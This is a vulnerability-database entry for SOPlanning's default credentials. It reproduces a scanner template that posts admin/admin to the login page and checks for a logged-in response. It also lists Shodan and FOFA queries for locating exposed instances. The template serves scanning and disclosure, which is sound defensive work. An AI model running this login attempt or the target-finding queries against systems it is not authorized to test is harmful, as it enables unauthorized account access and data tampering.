漏洞描述
SOPlanning contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
soplanning-default-login: SOPlanning - Default Login
PoC代码[已公开]
id: soplanning-default-login
info:
name: SOPlanning - Default Login
author: s4e-io
severity: high
description: |
SOPlanning contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.soplanning.org/en/
metadata:
verified: true
max-request: 1
vendor: soplanning
product: soplanning
shodan-query:
- html:"soplanning"
- http.html:"soplanning"
fofa-query: body="soplanning"
tags: soplanning,default-login,vuln
http:
- raw:
- |
POST /process/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- 'title="Logout"'
- 'title="Modify my profile"'
- "Settings"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402203ea10ee3d655eb2af573f0dc0170f6afda9136c8c5a9738f101516ed8ec4e3ed02205720293e35940f13fd7083c8df5d9a810bc35f66176c41aec69f62f8ceaf2e95:922c64590222798bb761d5b6d8e72950